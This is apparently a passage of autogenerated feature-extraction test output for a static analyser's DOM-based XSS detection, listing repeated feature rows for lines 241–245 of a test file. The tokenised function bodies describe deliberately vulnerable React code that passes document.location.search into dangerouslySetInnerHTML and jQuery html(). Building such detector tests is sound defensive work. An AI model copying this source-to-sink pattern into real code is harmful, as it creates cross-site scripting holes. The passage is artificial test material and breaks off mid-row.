URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:241:13:241:29 | tainted4: tainted | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:241:13:241:29 | tainted4: tainted | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:241:13:241:29 | tainted4: tainted | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:241:13:241:29 | tainted4: tainted | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:241:13:241:29 | tainted4: tainted | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:241:13:241:29 | tainted4: tainted | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:241:13:241:29 | tainted4: tainted | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:241:13:241:29 | tainted4: tainted | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:241:13:241:29 | tainted4: tainted | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:241:23:241:29 | tainted | CalleeFlexibleAccessPath | C2 | +| autogenerated/Xss/DomBasedXss/tst.js:241:23:241:29 | tainted | InputAccessPathFromCallee | ?.tainted4 | +| autogenerated/Xss/DomBasedXss/tst.js:241:23:241:29 | tainted | InputArgumentIndex | 0 | +| autogenerated/Xss/DomBasedXss/tst.js:241:23:241:29 | tainted | assignedToPropName | tainted4 | +| autogenerated/Xss/DomBasedXss/tst.js:241:23:241:29 | tainted | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:241:23:241:29 | tainted | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:241:23:241:29 | tainted | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:241:23:241:29 | tainted | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:241:23:241:29 | tainted | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:244:5:253:5 | C3 | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:244:5:253:5 | C3 | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:244:5:253:5 | C3 | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:244:5:253:5 | C3 | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:244:5:253:5 | C3 | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:244:5:253:5 | class C ... }\\n } | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:244:5:253:5 | class C ... }\\n } | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:244:5:253:5 | class C ... }\\n } | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:244:5:253:5 | class C ... }\\n } | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:244:5:253:5 | class C ... }\\n } | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:244:11:244:12 | C3 | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:244:11:244:12 | C3 | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:244:11:244:12 | C3 | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:244:11:244:12 | C3 | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:244:11:244:12 | C3 | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:244:22:244:26 | React | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:244:22:244:26 | React | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:244:22:244:26 | React | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:244:22:244:26 | React | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:244:22:244:26 | React | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:244:22:244:36 | React.Component | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:244:22:244:36 | React.Component | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:244:22:244:36 | React.Component | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:244:22:244:36 | React.Component | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:244:22:244:36 | React.Component | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:244:28:244:36 | Component | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:244:28:244:36 | Component | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:244:28:244:36 | Component | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:244:28:244:36 | Component | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:244:28:244:36 | Component | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:245:9:245:19 | constructor | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:245:9:245:19 | constructor | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:245:9:245:19 | constructor | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:245:9:245:19 | constructor | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:245:9:245:19 | constructor | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:245:9:248:9 | constru ... } | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:245:9:248:9 | constru ... } | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:245:9:248:9 | constru ... } | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:245:9:248:9 | constru ... } | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:245:9:248:9 | constru ... } | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:245:9:248:9 | constru ... } | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:245:9:248:9 | constru ... } | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:245:9:248:9 | constru ... } | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:245:9:248:9 | constru ... } | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:245:9:248:9 | constru ... } | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:245:20:245:19 | this | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:245:20:245:19 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:245:20:245:19 | this | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:245:20:245:19 | this | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:245:20:245:19 | this | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:245:20:248:9 | 'arguments' object of constructor of class C3 | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:245:20:248:9 | 'arguments' object of constructor of class C3 | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:245:20:248:9 | 'arguments' object of constructor of class C3 | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:245:20:248:9 | 'arguments' object of constructor of class C3 | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:245:20:248:9 | 'arguments' object of constructor of class C3 | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:245:20:248:9 | (props) ... } | assignedToPropName | constructor | +| autogenerated/Xss/DomBasedXss/tst.js:245:20:248:9 | (props) ... } | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:245:20:248:9 | (props) ... } | contextSurroundingFunctionParameters | ()\n(props) | +| autogenerated/Xss/DomBasedXss/tst.js:245:20:248:9 | (props) ... } | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:245:20:248:9 | (props) ... } | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:245:20:248:9 | (props) ... } | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:245:20:248:9 | exceptional return of constructor of class C3 | contextFunctionInterfaces | 